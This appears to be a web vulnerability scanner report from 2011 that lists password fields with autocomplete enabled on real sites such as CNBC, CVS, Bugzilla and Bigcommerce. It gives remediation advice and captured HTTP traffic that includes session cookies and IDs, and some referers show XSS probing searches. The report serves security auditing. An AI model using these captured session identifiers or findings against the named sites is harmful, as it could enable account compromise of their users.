GET /analytics?conly=true&visitor_id=191471275&pi_opt_in=&campaign_id=1407&account_id=2852&title=Ecommerce%20Storefront%20Software%20%7C%20Online%20Storefront%20Software&browser=Chrome&browser_version=13&operating_system=Windows&language=en-US&screen_height=1200&screen_width=1920&flash=true&java=true&url=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Ffeature.aspx&referrer=http%3A%2F%2Fwww.znode.com%2Fznode-multifront%2Fdefault.aspx%3Fpi_ad_id%3D7270542494%26gclid%3DCLLul7r4iKsCFQVrgwodzysJ5Q HTTP/1.1
Host: www2.znode.com
Proxy-Connection: keep-alive
Referer: http://www.znode.com/znode-multifront/feature.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pardot=erpfv597lcoo1t2jorm9rsnvu5; visitor_id1852=191471185; __utma=58486625.433211037.1315341123.1315341123.1315341123.1; __utmb=58486625.2.10.1315341123; __utmc=58486625; __utmz=58486625.1315341123.1.1.utmgclid=CLLul7r4iKsCFQVrgwodzysJ5Q|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=ATG%20e-commerce%20solutio

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:56 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3p: CP="CAO DSP AND SO ON" policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding,User-Agent
Content-Length: 42
Content-Type: text/javascript; charset=utf-8
Set-Cookie: pi_opt_in1852=2d4456d0e1929f239244e44b; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/
Set-Cookie: visitor_id1852=191471275; expires=Mon, 06-Sep-2021 15:33:57 GMT; path=/
X-Pardot-LB: lb-s2
Connection: close

function piResponse() {

}
piResponse();

14. Password field with autocomplete enabled previous next
There are 19 instances of this issue:

https://bugzilla.mozilla.org/show_bug.cgi
https://bugzilla.mozilla.org/show_bug.cgi
http://digg.com/submit
https://login.cnbc.com/cas/login
https://login.cnbc.com/cas/login
https://login.cnbc.com/cas/login
https://login.cnbc.com/cas/login
https://oracleus.wingateweb.com/portal/newreg.ww
https://register.cnbc.com/createUser.do
https://register.cnbc.com/registerUser.do
https://www.atg.com/service/main.jsp
http://www.bigcommerce.com/freetrial.php
https://www.bigcommerce.com/login.php
https://www.cvs.com/CVSApp/user/login.jsp
http://www.fetchback.com/
http://www.oraclecfo.com/Authentication/Login_w.html
http://www.oraclecfo.com/Main/Home/Home_w.html
http://www.oraclecfo.com/Main/Solutions/Solutions_w.html
http://www.shopify.com/login

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12117

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>

...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_top"
onsubmit="return check_mini_login_fields( '_top' );"
>
<input id="Bugzilla_login_top"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_top')"
>
<input class="bz_password"
id="Bugzilla_password_top"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_top" value="password"
onfocus="mini_login_on_focus('_top')"
>
...[SNIP]...

14.2. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Backend-Server: pp-app-bugs03
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Strict-transport-security: max-age=2629744; includeSubDomains
Date: Tue, 06 Sep 2011 17:06:19 GMT
Keep-Alive: timeout=300, max=1000
Connection: close
X-frame-options: SAMEORIGIN
Content-Length: 12117

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Search by bug number</title>

...[SNIP]...
</a>
<form action="https://bugzilla.mozilla.org/show_bug.cgi" method="POST"
class="mini_login bz_default_hidden"
id="mini_login_bottom"
onsubmit="return check_mini_login_fields( '_bottom' );"
>
<input id="Bugzilla_login_bottom"
class="bz_login"
name="Bugzilla_login"
onfocus="mini_login_on_focus('_bottom')"
>
<input class="bz_password"
id="Bugzilla_password_bottom"
name="Bugzilla_password"
type="password"
>
<input class="bz_password bz_default_hidden bz_mini_login_help" type="text"
id="Bugzilla_password_dummy_bottom" value="password"
onfocus="mini_login_on_focus('_bottom')"

...[SNIP]...

14.3. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL:

http://digg.com/submit

The form contains the following password field with autocomplete enabled:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

14.4. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The page contains a form with the following action URL:

https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header

The form contains the following password field with autocomplete enabled:

password

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; TZM=-300; s_cc=true; __qseg=Q_D; s_nr=1315339382427; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DFront%25257CHome%25257Chomeus%25257C15839285%25257CStock%252520Market%252520News%25252C%252520Business%252520News%25252C%252520Financial%25252C%252520Earni%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/%252523%2526ot%253DA; cnbc_regional_cookie=US

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:03:07 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 5684
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="background-color: #ffffff; width: 330px;">
           <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&source=header&login_view=header">
            <input type="hidden" name="lt" value="_c93742DC7-8E51-DACF-2006-E90E8F3C3F62_k6F751721-4392-885A-E4F8-81B3503C4357" />
...[SNIP]...
<div class="inputDiv">

                        <input name="password" type="password" class="notVisited" onkeydown="entsub1(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>

</div>
...[SNIP]...

14.5. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The page contains a form with the following action URL:

https://login.cnbc.com/cas/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /cas/login HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:04:32 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88450

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
                           <form method="post" name="loginForm" action="login">
                            <input type="hidden" name="lt" value="_c2FBB13A9-B804-689D-A91D-586630FD8B16_kBA3C6101-34E1-55C2-CB4E-332BF7120AA6" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>

</div>
...[SNIP]...

14.6. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The page contains a form with the following action URL:

https://login.cnbc.com/cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register

The form contains the following password field with autocomplete enabled:

password

Request

GET /cas/login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339139226; s_sq=%5B%5BB%5D%5D; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:34 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 88546

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
                           <form method="post" name="loginForm" action="login?service=https%3A%2F%2Fregister.cnbc.com%2Fj_acegi_cas_security_check&login_view=register">
                            <input type="hidden" name="lt" value="_cB02421FE-411A-E96B-30ED-2D9711CC8C17_k116C7869-1B9B-CA43-E387-87BEB7F6E4CE" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>

</div>
...[SNIP]...

14.7. https://login.cnbc.com/cas/login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/login

Issue detail

The page contains a form with the following action URL:

https://login.cnbc.com/cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription

The form contains the following password field with autocomplete enabled:

password

Request

GET /cas/login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription HTTP/1.1
Host: login.cnbc.com
Connection: keep-alive
Referer: http://pro.cnbc.com/index.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=91914748D5C5843DB9029C8B383DFD63; __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; __qseg=Q_D; TZM=-300; s_cc=true; s_nr=1315339339586; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DMember%252520Center%25257CPassword%252520Reset%25257CEmail%2526pidt%253D1%2526oid%253Dhttp%25253A//pro.cnbc.com/%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:02:23 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Language: en-US
Content-Length: 7033
Keep-Alive: timeout=15
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-
...[SNIP]...
<div style="float:left;margin-top:20px;margin-left:20px; width: 255px;" align="left">
                           <form method="post" name="loginForm" action="login?service=http%3A%2F%2Flogin.cnbc.com%2Ftpauth%2Fj_acegi_cas_security_check%3Bjsessionid%3D525F22D55B66231C5B585C2AC1574EF8&source_type=pro&apphome=http%3A%2F%2Fpro.cnbc.com%2Findex.asp&login_view=subscription">
                            <input type="hidden" name="lt" value="_c275D0947-338E-C116-8994-90DE377A9048_kE686DA16-D014-ACCF-07D2-726F8B6163E2" />
...[SNIP]...
<div class="inputDiv">

                                    <input name="password" type="password" class="notVisited" onkeydown="entsub(event);" onfocus="this.className='current'" onblur="this.className='doneWith';"/>

</div>
...[SNIP]...

14.8. https://oracleus.wingateweb.com/portal/newreg.ww previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://oracleus.wingateweb.com
Path:	/portal/newreg.ww

Issue detail

The page contains a form with the following action URL:

https://oracleus.wingateweb.com/portal/processLogin.ww

The form contains the following password field with autocomplete enabled:

password

Request

GET /portal/newreg.ww?brand=jone&eve=ow&wt=ow HTTP/1.1
Host: oracleus.wingateweb.com
Connection: keep-alive
Referer: http://www.oracle.com/openworld/register/packages/index.html?src=7013425&Act=226
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.1.8
Cache-Control: no-cache
Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Sep 2011 15:54:14 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache
Connection: Keep-Alive
Content-Length: 11209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="expir
...[SNIP]...
</p>

<form name="loginForm" method="post" action="/portal/processLogin.ww" id="loginForm">
   <fieldset>
...[SNIP]...
</label>
           <input type="password" name="password" value="" />
       </div>
...[SNIP]...

14.9. https://register.cnbc.com/createUser.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/createUser.do

Issue detail

The page contains a form with the following action URL:

https://register.cnbc.com/createUser.do

The form contains the following password fields with autocomplete enabled:

password
passwordConfirm

Request

GET /createUser.do HTTP/1.1
Host: register.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:45 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=834785856.23040.0000; expires=Tue, 06-Sep-2011 18:05:45 GMT; path=/
Content-Length: 54215

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<div id="mainContent" class="mainContent" align="left">
<form name="userBasicRegistrationForm" method="post" action="/createUser.do">
<input type="hidden" name="international" value="" id="international">
...[SNIP]...
<div class="inputDiv">
<input type="password" name="password" maxlength="20" value="" onfocus="this.className='current';
document.getElementById('pwdInfo').style.visibility = 'visible';
document.getElementById('pwdInfo').style.display = 'block';
toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError');
document.getElementById('pwdChecking').style.display = 'none';
document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited">
</div>
...[SNIP]...
<div class="inputDiv">
<input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 'pwdWrong');" class="notVisited">
</div>
...[SNIP]...

14.10. https://register.cnbc.com/registerUser.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://register.cnbc.com
Path:	/registerUser.do

Issue detail

The page contains a form with the following action URL:

https://register.cnbc.com/createUser.do

The form contains the following password fields with autocomplete enabled:

password
passwordConfirm

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:01:37 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate
Cache-Control: pre-check=0, post-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: pers_cookie_insert_cnbc.com_Prod_registration_servers_443=1472320064.23040.0000; expires=Tue, 06-Sep-2011 18:01:37 GMT; path=/
Content-Length: 53350

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<div id="mainContent" class="mainContent" align="left">
<form name="userBasicRegistrationForm" method="post" action="/createUser.do">
<input type="hidden" name="international" value="" id="international">
...[SNIP]...
<div class="inputDiv">
<input type="password" name="password" maxlength="20" value="" onfocus="this.className='current';
document.getElementById('pwdInfo').style.visibility = 'visible';
document.getElementById('pwdInfo').style.display = 'block';
toggleMessage('pwdChecking', 'pwdSuccess', 'pwdError');
document.getElementById('pwdChecking').style.display = 'none';
document.getElementById('pwdChecking').style.visibility = 'hidden';" id="password" class="notVisited">
</div>
...[SNIP]...
<div class="inputDiv">
<input type="password" name="passwordConfirm" value="" onblur="this.className='doneWith';confirmPassword(this);" onfocus="this.className='current';hideThem('pwdRight', 'pwdWrong');" class="notVisited">
</div>
...[SNIP]...

14.11. https://www.atg.com/service/main.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.atg.com
Path:	/service/main.jsp

Issue detail

The page contains a form with the following action URL:

https://www.atg.com/service/main.jsp?t=homeTab&locale=7cd9f92e1f6617753dfce39&_dyncharset=UTF-8&_DARGS=/service/panels/loginPanel.jsp.login

The form contains the following password field with autocomplete enabled:

/atg/svc/self/ui/formhandlers/SelfServiceProfileFormHandler.value.password

Request

GET /service/main.jsp?t=homeTab&locale=&_dyncharset=UTF-8 HTTP/1.1
Host: www.atg.com
Connection: keep-alive
Referer: http://www.atg.com/service/main.jsp?t=searchTab&dosearch=true&SearchButton=Find&searchstring=xss+faq+help&search=GO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ngt_ses=445D9FA4; __ngt_cli=8778554336C857464473DAAC; __ngt_ref=google%2BATG%2520e-commerce%2520solutio; sifrFetch=true; __utma=254092376.212551518.1315341136.1315341136.1315341136.1; __utmb=254092376.2.10.1315341136; __utmc=254092376; __utmz=254092376.1315341136.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ATG%20e-commerce%20solutio; _mkto_trk=id:904-KUW-942&token:_mch-atg.com-1315341137119-43295; JSESSIONID=7BEBA85DDD3B09D2BB095640CBA3C203.22

Response

14.12. http://www.bigcommerce.com/freetrial.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/freetrial.php

Issue detail

The page contains a form with the following action URL:

http://www.bigcommerce.com/signup.php

The form contains the following password fields with autocomplete enabled:

password
password2

Request

Response

14.13. https://www.bigcommerce.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.bigcommerce.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://www.bigcommerce.com/login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /login.php HTTP/1.1
Host: www.bigcommerce.com
Connection: keep-alive
Referer: https://www.bigcommerce.com/compatible-with.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: roi_visitor=visitorid%3D1421498772%7Cfirstvisit%3D2011-09-06+10%3A32%3A12%7Cquery%3DATG%2Be-commerce%2Bsolutio%7Creferer%3Dwww.google.com%7Clandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; roi_attribution=firstclick%3D2011-09-06+10%3A32%3A12%7Csource%3Dgoogle%7Cmedium%3Dcpc%7Ccampaign%3D%28roi%29+ecommerce%7Cadgroup%3Decommerce+solutions%7Ckeyword%3De+commerce+solutions%7Csitelinks%3D%7Ccreative%3D%7Ctaggedquery%3DATG%2Be-commerce%2Bsolutio%7Ctaggedreferer%3Dwww.google.com%7Ctaggedlandingpage%3D%2Flp%2Fe1-lp-ecommerce.php; PHPSESSID=uslit8t7n7398s125sv5aib45osrfqfo; __utmz=41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utmz=^first.1331109506396:41658941.1315341506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 2__utma=^first.1378413566287:41658941.1556216253.1315341506.1315341506.1315341506.1; 2__utmb=^first.1315343366287:41658941.4.10.1315341506; 2__utmc=^first.1378413566287:41658941; __utma=41658941.485543067.1315341506.1315341506.1315341506.1; __utmb=41658941.9.10.1315341506; __utmc=41658941

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:39:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14684
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
   <meta http-equiv="Content-type" cont
...[SNIP]...
<div id="LoginFormPrimary">
           <form method="post" action="/login.php">
               <fieldset>
...[SNIP]...
<dd><input type="password" class="Textbox" id="password" name="password" value="" /></dd>
...[SNIP]...

14.14. https://www.cvs.com/CVSApp/user/login.jsp previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.cvs.com
Path:	/CVSApp/user/login.jsp

Issue detail

The page contains a form with the following action URL:

https://www.cvs.com/CVSApp/user/login.jsp?_DARGS=/CVSApp/user/login.jsp

The form contains the following password field with autocomplete enabled:

/atg/userprofiling/ProfileFormHandler.value.password

Request

GET /CVSApp/user/login.jsp?pagevalue=newrx&screenname=newrx&_requestid=362832 HTTP/1.1
Host: www.cvs.com
Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6A0441D1E876CF59B214E21046F87449.commerce_311; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315345643244:ss=1315345545800

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:29 GMT
Server: Apache-Coyote/1.1
X-HP-CAM-COLOR: V=1;ServerAddr=HUTy7wKKcZBJ+snDqdX2/g==;GUID=1|v2-QkLk0k1KwHzJd1VhmMdZIuGGBhJY04BWxnXwFEE7mWgY1E9PA8MxLexKjvy9O|L0NWU0FwcC91c2VyL2xvZ2luLmpzcA..
Content-Type: text/html;charset=ISO-8859-1
Cache-Control: max-age=0
Expires: Tue, 06 Sep 2011 16:47:29 GMT
Vary: Accept-Encoding
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Length: 47742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html dir="ltr" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<td align="left">

<form action="login.jsp?_DARGS=/CVSApp/user/login.jsp" method="post"><input name="_dyncharset" value="ISO-8859-1" type="hidden">
...[SNIP]...
<p>
<input id="password" maxlength="25" name="/atg/userprofiling/ProfileFormHandler.value.password" value="" type="password" size="25"><input name="_D:/atg/userprofiling/ProfileFormHandler.value.password" value=" " type="hidden">
...[SNIP]...

